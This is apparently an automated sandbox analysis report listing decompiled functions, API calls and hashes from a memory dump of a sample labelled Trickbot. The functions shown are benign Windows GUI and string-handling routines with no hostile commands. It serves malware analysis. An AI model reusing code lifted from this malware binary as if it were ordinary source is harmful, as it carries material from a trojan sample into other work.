				GetWindowRect(_t24,  &_v16);
				InflateRect( &_v16, 1, 1);
				_t25 = GetParent(_t24);
				ScreenToClient(_t25,  &_v16);
				ScreenToClient(_t25,  &(_v16.right));
				if((_t11 & 0x00200000) != 0) {
					_v16.right.x = _v16.right.x + 1;
				}
				return ValidateRect(_t25,  &_v16);
			}

0x004123a8
0x004123ad
0x004123bb
0x004123ca
0x004123d7
0x004123e5
0x004123ed
0x004123f5
0x004123f7
0x004123f7
0x0041240d

APIs

GetWindowLongA.USER32(?,000000F0), ref: 004123AD
GetWindowRect.USER32(?,?), ref: 004123BB
InflateRect.USER32(?,00000001,00000001), ref: 004123CA
GetParent.USER32(?), ref: 004123D1
ScreenToClient.USER32(00000000,?), ref: 004123E5
ScreenToClient.USER32(00000000,?), ref: 004123ED
ValidateRect.USER32(00000000,?), ref: 00412401

Memory Dump Source

Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd

Similarity

API ID: Rect$ClientScreenWindow$InflateLongParentValidate
String ID:
API String ID: 2275295265-0
Opcode ID: f7dea636adf4077913466b5b5a216d9a79ed7483342d5355e0f9903ac15ee76c
Instruction ID: e7bcff5f8da7a4d5e0e189ee2742adf088c98ecf8293d2a2db97943227d4e63b
Opcode Fuzzy Hash: f7dea636adf4077913466b5b5a216d9a79ed7483342d5355e0f9903ac15ee76c
Instruction Fuzzy Hash: 20F08C72004201BFD7019B64DCC8EBF77BCEB89721F005529FA1592190EB789C4ACB66

Uniqueness

Uniqueness Score: -1.00%

Function 0041CB6C, Relevance: 10.5, APIs: 7, Instructions: 29
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041CB6C(void* __ecx) {
				struct HBRUSH__* _t14;
				void* _t18;

				_t18 = __ecx;
				 *((intOrPtr*)(_t18 + 0x28)) = GetSysColor(0xf);
				 *((intOrPtr*)(_t18 + 0x2c)) = GetSysColor(0x10);
				 *((intOrPtr*)(_t18 + 0x30)) = GetSysColor(0x14);
				 *((intOrPtr*)(_t18 + 0x34)) = GetSysColor(0x12);
				 *((intOrPtr*)(_t18 + 0x38)) = GetSysColor(6);
				 *((intOrPtr*)(_t18 + 0x24)) = GetSysColorBrush(0xf);
				_t14 = GetSysColorBrush(6);
				 *(_t18 + 0x20) = _t14;
				return _t14;
			}

0x0041cb74
0x0041cb7c
0x0041cb83
0x0041cb8a
0x0041cb91
0x0041cb9e
0x0041cba5
0x0041cba8
0x0041cbaa
0x0041cbaf

APIs

GetSysColor.USER32(0000000F), ref: 0041CB78
GetSysColor.USER32(00000010), ref: 0041CB7F
GetSysColor.USER32(00000014), ref: 0041CB86
GetSysColor.USER32(00000012), ref: 0041CB8D
GetSysColor.USER32(00000006), ref: 0041CB94
GetSysColorBrush.USER32(0000000F), ref: 0041CBA1
GetSysColorBrush.USER32(00000006), ref: 0041CBA8

Memory Dump Source

Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd

Similarity

API ID: Color$Brush
String ID:
API String ID: 2798902688-0
Opcode ID: 5df08f61adf17e4aa9a15bcdc8f254d034e7b8af24fa43631ef943c2a6205831
Instruction ID: 7db4f0b211aa0832e3ed1348ebccc7ee9ea4e0244eb3583bd5885322743caac1
Opcode Fuzzy Hash: 5df08f61adf17e4aa9a15bcdc8f254d034e7b8af24fa43631ef943c2a6205831
Instruction Fuzzy Hash: EDF0F8719407489BD720AB729D09B47BAE0FFC4B10F02192ED2858BAD0E6F5A401DF44

Uniqueness

Uniqueness Score: -1.00%

Function 0042CC04, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 25
registrywindowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0042CC04() {
				long _t5;
				int _t6;

				if((0x80000000 & GetVersion()) == 0 || GetVersion() != 4) {
					_t5 = GetVersion();
					if((0x80000000 & _t5) != 0) {
						L6:
						 *0x44b2b8 =  *0x44b2b8 & 0x00000000;
						return _t5;
					}
					_t5 = GetVersion();
					if(_t5 != 3) {
						goto L6;
					}
					goto L5;
				} else {
					L5:
					_t6 = RegisterWindowMessageA("MSWHEEL_ROLLMSG");
					 *0x44b2b8 = _t6;
					return _t6;
				}
			}

0x0042cc1a
0x0042cc24
0x0042cc28
0x0042cc44
0x0042cc44
0x00000000
0x0042cc44
0x0042cc2a
0x0042cc30
0x00000000
0x00000000
0x00000000
0x0042cc32
0x0042cc32
0x0042cc37
0x0042cc3d
0x00000000
0x0042cc3d

APIs

GetVersion.KERNEL32 ref: 0042CC11
GetVersion.KERNEL32 ref: 0042CC1C
GetVersion.KERNEL32 ref: 0042CC24
GetVersion.KERNEL32 ref: 0042CC2A
RegisterWindowMessageA.USER32(MSWHEEL_ROLLMSG), ref: 0042CC37

Strings

MSWHEEL_ROLLMSG, xrefs: 0042CC32

Memory Dump Source

Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd

Similarity

API ID: Version$MessageRegisterWindow
String ID: MSWHEEL_ROLLMSG
API String ID: 303823969-2485103130
Opcode ID: ec8e88c4bea841d715c55652186ebbf0fbb4d526e658b3d34fc1f032cc14f165
Instruction ID: 52106b3e10c009f1a4f9a9e7a117119cde2b908ece77d3df51b346f72239867c
Opcode Fuzzy Hash: ec8e88c4bea841d715c55652186ebbf0fbb4d526e658b3d34fc1f032cc14f165
Instruction Fuzzy Hash: D0E0D83EA0413656D7255769BC8436D15949749350FB14037C804432549A7C488387AE

Uniqueness

Uniqueness Score: -1.00%

Function 00434101, Relevance: 9.2, APIs: 6, Instructions: 182
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E00434101(void* __ecx) {
				struct HDC__* _t87;
				intOrPtr* _t88;
				struct HDC__* _t97;
				intOrPtr _t98;
				int _t100;
				struct HDC__* _t110;
				int _t122;
				intOrPtr* _t126;
				void* _t136;
				intOrPtr* _t137;
				struct HDC__** _t138;
				int _t153;
				intOrPtr _t157;
				signed short _t171;
				int _t175;
				void* _t178;
				void* _t180;

				E00405340(E00437BB7, _t180);
				_t178 = __ecx;
				 *(__ecx + 0x70) =  *(_t180 + 8);
				_t87 = E0041BDEB(0x3c);
				 *(_t180 + 8) = _t87;
				 *(_t180 - 4) =  *(_t180 - 4) & 0x00000000;
				if(_t87 == 0) {
					_t88 = 0;
					__eflags = 0;
				} else {
					_t88 = E00435B9E(_t87);
				}
				 *((intOrPtr*)(_t178 + 0x114)) = _t88;
				 *(_t180 - 4) =  *(_t180 - 4) | 0xffffffff;
				 *((intOrPtr*)( *_t88 + 0x3c)) = 0x7009;
				_t175 = 1;
				 *( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t178 + 0x114)))) + 0x5c)) + 0x14) =  *( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t178 + 0x114)))) + 0x5c)) + 0x14) | 0x00000040;
				 *( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t178 + 0x114)))) + 0x5c)) + 0x15) =  *( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t178 + 0x114)))) + 0x5c)) + 0x15) & 0x000000fe;
				 *( *((intOrPtr*)(_t178 + 0x114)) + 8) = _t175;
				_t97 = E0041BDEB(0x40);
				 *(_t180 + 8) = _t97;
				_t186 = _t97;
				 *(_t180 - 4) = _t175;
				if(_t97 == 0) {
					_t98 = 0;
					__eflags = 0;
				} else {
					_t98 = E00436147(_t97, _t186);
				}
				 *(_t180 - 4) =  *(_t180 - 4) | 0xffffffff;
				 *((intOrPtr*)(_t178 + 0x74)) = _t98;
				_t100 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t178 + 0x70)))) + 0xf4))( *((intOrPtr*)(_t178 + 0x114)));
				if(_t100 != 0) {
					_t137 = _t178 + 0x78;
					E00420D5B(_t137,  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t178 + 0x114)))) + 0x5c)) + 0x10)));
					 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t178 + 0x74)))) + 0xc))( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t178 + 0x114)))) + 0x5c)) + 0x10)), _t136);
					 *( *((intOrPtr*)(_t178 + 0x74)) + 0xc) = _t175;
					 *(_t178 + 0x84) = _t175;
					 *((intOrPtr*)( *_t137 + 0x1c))();
					_t110 = GetDC( *(_t178 + 0x1c));
					 *(_t180 + 8) = _t110;
					 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t178 + 0x74)))) + 0x10))(_t110);
					 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t178 + 0x70)))) + 0xf8))( *((intOrPtr*)(_t178 + 0x74)),  *((intOrPtr*)(_t178 + 0x114)));
					 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t178 + 0x74)))) + 0x18))();
					ReleaseDC( *(_t178 + 0x1c),  *(_t180 + 8));
					 *((intOrPtr*)( *_t137 + 0x20))(0xffffffff);
					_t138 = _t178 + 0x80;
					 *((intOrPtr*)(_t178 + 0x104)) = GetDeviceCaps( *_t138, 0x58);
					 *((intOrPtr*)(_t178 + 0x108)) = GetDeviceCaps( *_t138, 0x5a);
					_t122 =  *( *((intOrPtr*)(_t178 + 0x114)) + 0x18);
					_t188 = _t122;
					 *(_t178 + 0xf8) = _t122;
					if(_t122 != 0) {
						_t153 =  *(_t178 + 0xf0);
						__eflags = _t122 - _t153;
						if(__eflags > 0) {
							 *(_t178 + 0xf8) = _t153;
						}
					} else {
						 *(_t178 + 0xf8) = _t175;
					}
					 *(_t178 + 0xe8) =  *(_t178 + 0xf8);
					_push(0x43b688);
					_push(0x43b688);
					_push(_t175);
					_push(_t175);
					_push(_t175);
					E0041FDB2(_t178, _t188);
					_t126 =  *((intOrPtr*)(_t178 + 0x114));
					_t157 =  *((intOrPtr*)( *_t126 + 0x5c));
					_t171 =  *((intOrPtr*)(_t157 + 0x1e));
					if(_t171 >= 0x8000 || (_t171 & 0x0000ffff) - ( *(_t157 + 0x1c) & 0x0000ffff) > 0x7fff) {
						ShowScrollBar( *(_t178 + 0x1c), _t175, 0);
					} else {
						 *((intOrPtr*)(_t180 - 0x24)) = 3;
						 *(_t180 - 0x20) =  *( *((intOrPtr*)( *_t126 + 0x5c)) + 0x1c) & 0x0000ffff;
						 *(_t180 - 0x1c) =  *( *((intOrPtr*)( *_t126 + 0x5c)) + 0x1e) & 0x0000ffff;
						 *(_t180 - 0x18) = _t175;
						if(E0041A10F(_t178, _t175, _t180 - 0x28, 0) == 0) {
							E0041A069(_t178, _t175,  *(_t180 - 0x20),  *(_t180 - 0x1c), 0);
						}
					}
					E00434FEB(_t178,  *((intOrPtr*)( *((intOrPtr*)(_t178 + 0x114)) + 0x14)), _t175);
					_t100 = _t175;
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t180 - 0xc));
				return _t100;
			}

0x00434106
0x00434112
0x00434117
0x0043411a
0x00434120
0x00434123
0x00434129
0x00434134
0x00434134
0x0043412b
0x0043412d
0x0043412d
0x00434136
0x0043413e
0x00434144
0x00434151
0x00434159
0x00434168
0x00434172
0x00434175
0x0043417b
0x0043417e
0x00434180
0x00434183
0x0043418e
0x0043418e
0x00434185
0x00434187
0x00434187
0x00434199
0x0043419d
0x004341a2
0x004341aa
0x004341b7
0x004341c4
0x004341dc
0x004341e4
0x004341e9
0x004341ef
0x004341f5
0x004341ff
0x00434204
0x00434215
0x00434220
0x00434229
0x00434235
0x00434238
0x0043424a
0x00434258
0x00434266
0x00434269
0x0043426b
0x00434271
0x0043427b
0x00434281
0x00434283
0x00434285
0x00434285
0x00434273
0x00434273
0x00434273
0x00434293
0x0043429e
0x0043429f
0x004342a0
0x004342a1
0x004342a2
0x004342a5
0x004342aa
0x004342b2
0x004342b5
0x004342be
0x0043431a
0x004342d1
0x004342d1
0x004342e2
0x004342f0
0x004342f8
0x00434302
0x0043430e
0x0043430e
0x00434302
0x0043432c
0x00434331
0x00434333
0x00434339
0x00434341

APIs

__EH_prolog.LIBCMT ref: 00434106
GetDC.USER32(?), ref: 004341F5
ReleaseDC.USER32(?,?), ref: 00434229
GetDeviceCaps.GDI32(?,00000058), ref: 00434242
GetDeviceCaps.GDI32(?,0000005A), ref: 00434252

Part of subcall function 00435B9E: __EH_prolog.LIBCMT ref: 00435BA3

ShowScrollBar.USER32(?,00000001,00000000), ref: 0043431A

Memory Dump Source

Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd

Similarity

API ID: CapsDeviceH_prolog$ReleaseScrollShow
String ID:
API String ID: 603669091-0
Opcode ID: 4b03c4a82a617fd816dc7df21d3c25be0cccdcb6e5e453de946e7498aaf37965
Instruction ID: e2c48de82ed0ec2d8506f1a4815bca7e2dea38620cab87d6c2353841960288cc
Opcode Fuzzy Hash: 4b03c4a82a617fd816dc7df21d3c25be0cccdcb6e5e453de946e7498aaf37965
Instruction Fuzzy Hash: 8B715870600A00DFCB29CF69C884AAABBF5FF88710F10456EE56ACB3A1D734E845CB14

Uniqueness

Uniqueness Score: -1.00%

Function 00425911, Relevance: 9.2, APIs: 6, Instructions: 168
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E00425911(intOrPtr* __ecx, struct tagPOINT _a4, intOrPtr _a8) {
				signed int _v8;
				struct tagRECT _v24;
				struct tagRECT _v40;
				struct tagRECT _v56;
				intOrPtr _v60;
				long _v64;
				char _v72;
				intOrPtr _t93;
				intOrPtr _t100;
				intOrPtr _t101;
				long _t104;
				long _t105;
				long _t109;
				void* _t113;
				intOrPtr _t116;
				intOrPtr* _t119;
				void* _t149;
				signed int _t151;
				signed int _t153;

				_t119 = __ecx;
				GetClientRect( *(__ecx + 0x1c),  &_v40);
				InflateRect( &_v40,  ~( *(_t119 + 0x60)),  ~( *(_t119 + 0x64)));
				 *((intOrPtr*)( *_t119 + 0x100))( &_v72);
				if( *((intOrPtr*)(_t119 + 0x74)) == 0 ||  *((intOrPtr*)(_t119 + 0x68)) >=  *((intOrPtr*)(_t119 + 0x40))) {
					L4:
					if( *((intOrPtr*)(_t119 + 0x70)) == 0 ||  *((intOrPtr*)(_t119 + 0x6c)) >=  *((intOrPtr*)(_t119 + 0x44))) {
						L9:
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_t151 = 0;
						_v8 = 0;
						if( *((intOrPtr*)(_t119 + 0x6c)) - 1 <= 0) {
							L13:
							asm("movsd");
							asm("movsd");
							asm("movsd");
							asm("movsd");
							_t153 = 0;
							if( *((intOrPtr*)(_t119 + 0x68)) - 1 <= 0) {
								L17:
								_t93 = _v8;
								if(_t93 ==  *((intOrPtr*)(_t119 + 0x6c)) - 1) {
									if(_t153 ==  *((intOrPtr*)(_t119 + 0x68)) - 1) {
										return 0;
									}
									_t78 = _t153 + 0x65; // 0x65
									return _t78;
								}
								if(_t153 ==  *((intOrPtr*)(_t119 + 0x68)) - 1) {
									return _t93 + 0xc9;
								}
								_t76 = _t93 + 0x12d; // 0x12d
								return _t153 * 0xf + _t76;
							}
							_t100 = _v24.top;
							_t149 = 0;
							while(1) {
								_push(_a8);
								_t101 = _t100 +  *((intOrPtr*)( *((intOrPtr*)(_t119 + 0x7c)) + _t149 + 8));
								_v24.top = _t101;
								_v24.bottom =  *((intOrPtr*)(_t119 + 0x5c)) + _t101;
								if(PtInRect( &_v24, _a4.x) != 0) {
									goto L17;
								}
								_t100 = _v24.bottom;
								_t153 = _t153 + 1;
								_t149 = _t149 + 0xc;
								_v24.top = _t100;
								if(_t153 <  *((intOrPtr*)(_t119 + 0x68)) - 1) {
									continue;
								}
								goto L17;
							}
							goto L17;
						}
						_t104 = _v24.left;
						while(1) {
							_push(_a8);
							_t105 = _t104 +  *((intOrPtr*)(_t151 +  *((intOrPtr*)(_t119 + 0x78)) + 8));
							_v24.left = _t105;
							_v24.right =  *((intOrPtr*)(_t119 + 0x58)) + _t105;
							if(PtInRect( &_v24, _a4.x) != 0) {
								goto L13;
							}
							_v8 = _v8 + 1;
							_t104 = _v24.right;
							_t151 = _t151 + 0xc;
							_v24.left = _t104;
							if(_v8 <  *((intOrPtr*)(_t119 + 0x6c)) - 1) {
								continue;
							}
							goto L13;
						}
						goto L13;
					} else {
						_t109 = _v40.left;
						_push(_a8);
						_v56.top = _v60;
						_v56.left = _t109;
						_v56.bottom = _v40.bottom;
						_v56.right =  *((intOrPtr*)(_t119 + 0x48)) -  *0x44b354 + _t109;
						if(PtInRect( &_v56, _a4.x) == 0) {
							goto L9;
						}
						_push(2);
						goto L8;
					}
				} else {
					_push(_a8);
					_v56.right = _v40.right;
					_v56.left = _v64;
					_t116 = _v40.top;
					_v56.top = _t116;
					_v56.bottom =  *((intOrPtr*)(_t119 + 0x4c)) -  *0x44b354 + _t116;
					if(PtInRect( &_v56, _a4) == 0) {
						goto L4;
					}
					_push(1);
					L8:
					_pop(_t113);
					return _t113;
				}
			}

0x0042591c
0x00425922
0x00425938
0x00425946
0x00425950
0x00425992
0x00425996
0x004259dc
0x004259e6
0x004259e7
0x004259e8
0x004259e9
0x004259ea
0x004259ef
0x004259f2
0x00425a32
0x00425a38
0x00425a39
0x00425a3d
0x00425a3e
0x00425a3f
0x00425a44
0x00425a83
0x00425a86
0x00425a8d
0x00425ab0
0x00000000
0x00425ab7
0x00425ab2
0x00000000
0x00425ab2
0x00425a95
0x00000000
0x00425aa3
0x00425a9a
0x00000000
0x00425a9a
0x00425a46
0x00425a49
0x00425a4b
0x00425a4e
0x00425a51
0x00425a5b
0x00425a63
0x00425a6f
0x00000000
0x00000000
0x00425a74
0x00425a77
0x00425a78
0x00425a7c
0x00425a81
0x00000000
0x00000000
0x00000000
0x00425a81
0x00000000
0x00425a4b
0x004259f4
0x004259f7
0x004259fa
0x004259fd
0x00425a07
0x00425a0f
0x00425a1b
0x00000000
0x00000000
0x00425a20
0x00425a23
0x00425a26
0x00425a2a
0x00425a30
0x00000000
0x00000000
0x00000000
0x00425a30
0x00000000
0x004259a0
0x004259a3
0x004259a6
0x004259a9
0x004259af
0x004259c0
0x004259c7
0x004259d2
0x00000000
0x00000000
0x004259d4
0x00000000
0x004259d4
0x0042595a
0x00425960
0x00425963
0x00425969
0x00425972
0x00425978
0x00425981
0x0042598c
0x00000000
0x00000000
0x0042598e
0x004259d6
0x004259d6
0x00000000
0x004259d6

APIs

GetClientRect.USER32(?,?), ref: 00425922
InflateRect.USER32(?,?,?), ref: 00425938
PtInRect.USER32(?,?,?), ref: 00425984
PtInRect.USER32(?,?,?), ref: 004259CA
PtInRect.USER32(?,?,?), ref: 00425A13
PtInRect.USER32(?,?,?), ref: 00425A67

Memory Dump Source

Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd

Similarity

API ID: Rect$ClientInflate
String ID:
API String ID: 256450704-0
Opcode ID: 223e93674fd9c974f1877316ad9a598224ee5069628fe09531244644cef74312
Instruction ID: ecc5f8c614df6f32e5f35bfb1dc92d4ae027dd3446eda98f838854cd67b6ac55
Opcode Fuzzy Hash: 223e93674fd9c974f1877316ad9a598224ee5069628fe09531244644cef74312
Instruction Fuzzy Hash: E2612271A01619DFCF09DFA8E884AAEB7B5FF08310B50416AEC06EB245D775EE41CB94

Uniqueness

Uniqueness Score: -1.00%

Function 0040A6E8, Relevance: 9.1, APIs: 6, Instructions: 117
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E0040A6E8(int _a4, char* _a8, int _a12, short* _a16, int _a20, int _a24, signed int _a28) {
				int _v8;
				intOrPtr _v20;
				short* _v28;
				short _v32;
				int _v36;
				short* _v40;
				void* _v56;
				int _t31;
				int _t32;
				int _t37;
				int _t43;
				int _t44;
				int _t45;
				void* _t53;
				short* _t60;
				int _t61;
				intOrPtr _t62;
				short* _t63;

				_push(0xffffffff);
				_push(0x43ea70);
				_push(E004070AC);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t62;
				_t63 = _t62 - 0x18;
				_v28 = _t63;
				_t31 =  *0x44b954; // 0x1
				if(_t31 != 0) {
					L6:
					if(_t31 != 2) {
						if(_t31 != 1) {
							goto L18;
						} else {
							if(_a20 == 0) {
								_t44 =  *0x44b970; // 0x0
								_a20 = _t44;
							}
							asm("sbb eax, eax");
							_t37 = MultiByteToWideChar(_a20, ( ~_a28 & 0x00000008) + 1, _a8, _a12, 0, 0);
							_v36 = _t37;
							if(_t37 == 0) {
								goto L18;
							} else {
								_v8 = 0;
								E00405B80(_t37 + _t37 + 0x00000003 & 0x000000fc, _t53);
								_v28 = _t63;
								_t60 = _t63;
								_v40 = _t60;
								E00405360(_t60, 0, _t37 + _t37);
								_v8 = _v8 | 0xffffffff;
								if(_t60 == 0) {
									goto L18;
								} else {
									_t43 = MultiByteToWideChar(_a20, 1, _a8, _a12, _t60, _v36);
									if(_t43 == 0) {
										goto L18;
									} else {
										_t32 = GetStringTypeW(_a4, _t60, _t43, _a16);
									}
								}
							}
						}
					} else {
						_t45 = _a24;
						if(_t45 == 0) {
							_t45 =  *0x44b960; // 0x0
						}
						_t32 = GetStringTypeA(_t45, _a4, _a8, _a12, _a16);
					}
				} else {
					_push( &_v32);
					_t61 = 1;
					if(GetStringTypeW(_t61, 0x43e9dc, _t61, ??) == 0) {
						if(GetStringTypeA(0, _t61, 0x43e9d8, _t61,  &_v32) == 0) {
							L18:
							_t32 = 0;
						} else {
							_t31 = 2;
							goto L5;
						}
					} else {
						_t31 = _t61;
						L5:
						 *0x44b954 = _t31;
						goto L6;
					}
				}
				 *[fs:0x0] = _v20;
				return _t32;
			}

0x0040a6eb
0x0040a6ed
0x0040a6f2
0x0040a6fd
0x0040a6fe
0x0040a705
0x0040a70b
0x0040a70e
0x0040a717
0x0040a757
0x0040a75a
0x0040a783
0x00000000
0x0040a789
0x0040a78c
0x0040a78e
0x0040a793
0x0040a793
0x0040a7a3
0x0040a7ad
0x0040a7b3
0x0040a7b8
0x00000000
0x0040a7ba
0x0040a7ba
0x0040a7c7
0x0040a7cc
0x0040a7cf
0x0040a7d1
0x0040a7d7
0x0040a7ec
0x0040a7f2
0x00000000
0x0040a7f4
0x0040a803
0x0040a80b
0x00000000
0x0040a80d
0x0040a815
0x0040a815
0x0040a80b
0x0040a7f2
0x0040a7b8
0x0040a75c
0x0040a75c
0x0040a761
0x0040a763
0x0040a763
0x0040a775
0x0040a775
0x0040a719
0x0040a71c
0x0040a71f
0x0040a72f
0x0040a749
0x0040a81d
0x0040a81d
0x0040a74f
0x0040a751
0x00000000
0x0040a751
0x0040a731
0x0040a731
0x0040a752
0x0040a752
0x00000000
0x0040a752
0x0040a72f
0x0040a825
0x0040a830

APIs

GetStringTypeW.KERNEL32(00000001,0043E9DC,00000001,00000000,?,00000100,00000000,004066EB,00000001,00000020,00000100,?,00000000), ref: 0040A727
GetStringTypeA.KERNEL32(00000000,00000001,0043E9D8,00000001,00000000,?,00000100,00000000,004066EB,00000001,00000020,00000100,?,00000000), ref: 0040A741
GetStringTypeA.KERNEL32(00000000,?,00000100,00000020,00000001,?,00000100,00000000,004066EB,00000001,00000020,00000100,?,00000000), ref: 0040A775
MultiByteToWideChar.KERNEL32(004066EB,00000101,00000100,00000020,00000000,00000000,?,00000100,00000000,004066EB,00000001,00000020,00000100,?,00000000), ref: 0040A7AD
MultiByteToWideChar.KERNEL32(004066EB,00000001,00000100,00000020,?,00000100,?,00000100,00000000,004066EB,00000001,00000020,00000100,?), ref: 0040A803
GetStringTypeW.KERNEL32(?,?,00000000,00000001,?,00000100,?,00000100,00000000,004066EB,00000001,00000020,00000100,?), ref: 0040A815

Memory Dump Source

Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd

Similarity

API ID: StringType$ByteCharMultiWide
String ID:
API String ID: 3852931651-0
Opcode ID: 832e27acd13adab07e40aa41c6bab8756545dd7dfe3adda8a3cae9fd998b57f8
Instruction ID: 13a4a901a618fadbe22495cf6ae146e2136fcfdc2a1035e847f11c636613aec9
Opcode Fuzzy Hash: 832e27acd13adab07e40aa41c6bab8756545dd7dfe3adda8a3cae9fd998b57f8
Instruction Fuzzy Hash: 76416D76501219AFCF119F94CC89EEB3B79EB09750F148436FA01E2290D378D9619B9A

Uniqueness

Uniqueness Score: -1.00%

Function 00431146, Relevance: 9.1, APIs: 6, Instructions: 109
windowCOMMON

Download Yara Rule

C-Code - Quality: 90%

			E00431146(intOrPtr __ecx, void* __esi) {
				intOrPtr _t51;
				void* _t53;
				intOrPtr _t58;
				signed int _t59;
				signed int _t77;
				intOrPtr _t84;
				intOrPtr* _t86;
				void* _t88;
				CHAR** _t90;
				void* _t91;

				E00405340(E00438050, _t91);
				_t84 = __ecx;
				 *((intOrPtr*)(_t91 - 0x1c)) = __ecx;
				_t51 = E0043127F(__ecx,  *((intOrPtr*)(_t91 + 0xc)), 0x14);
				if(_t51 == 0) {
					L19:
					 *[fs:0x0] =  *((intOrPtr*)(_t91 - 0xc));
					return _t51;
				}
				_t97 =  *((intOrPtr*)(_t91 + 8));
				 *((intOrPtr*)(_t91 - 0x18)) = 1;
				if( *((intOrPtr*)(_t91 + 8)) == 0) {
					L18:
					E00431353(_t84, 1, 1);
					_t51 =  *((intOrPtr*)(_t91 - 0x18));
					goto L19;
				}
				_t53 = SendMessageA( *(_t84 + 0x1c), 0x31, 0, 0);
				_push(0);
				_t88 = _t53;
				E004214F6(_t91 - 0x38, _t97);
				 *(_t91 - 4) = 0;
				 *(_t91 - 0x14) = 0;
				if(_t88 != 0) {
					 *(_t91 - 0x14) = SelectObject( *(_t91 - 0x34), _t88);
				}
				_t86 =  *((intOrPtr*)(_t84 + 0x5c));
				 *(_t91 - 0x10) = 0;
				if( *((intOrPtr*)(_t91 + 0xc)) <= 0) {
					L15:
					if( *(_t91 - 0x14) != 0) {
						SelectObject( *(_t91 - 0x34),  *(_t91 - 0x14));
					}
					 *(_t91 - 4) =  *(_t91 - 4) | 0xffffffff;
					E00421568(_t91 - 0x38,  *(_t91 - 4));
					_t84 =  *((intOrPtr*)(_t91 - 0x1c));
					goto L18;
				} else {
					_t90 = _t86 + 0x10;
					do {
						 *((intOrPtr*)(_t91 + 8)) =  *((intOrPtr*)(_t91 + 8)) + 4;
						_t58 =  *((intOrPtr*)( *((intOrPtr*)(_t91 + 8))));
						 *(_t90 - 4) =  *(_t90 - 4) | 0x00000001;
						_t100 = _t58;
						 *_t86 = _t58;
						if(_t58 == 0) {
							_t59 = GetSystemMetrics(0);
							asm("cdq");
							_t77 = 4;
							__eflags =  *(_t91 - 0x10);
							 *(_t90 - 0xc) = _t59 / _t77;
							if(__eflags == 0) {
								_t33 = _t90 - 8;
								 *_t33 =  *(_t90 - 8) | 0x08000100;
								__eflags =  *_t33;
							}
							goto L12;
						}
						if(E0041C67E(_t90, _t100, _t58) == 0) {
							L14:
							 *((intOrPtr*)(_t91 - 0x18)) = 0;
							goto L15;
						}
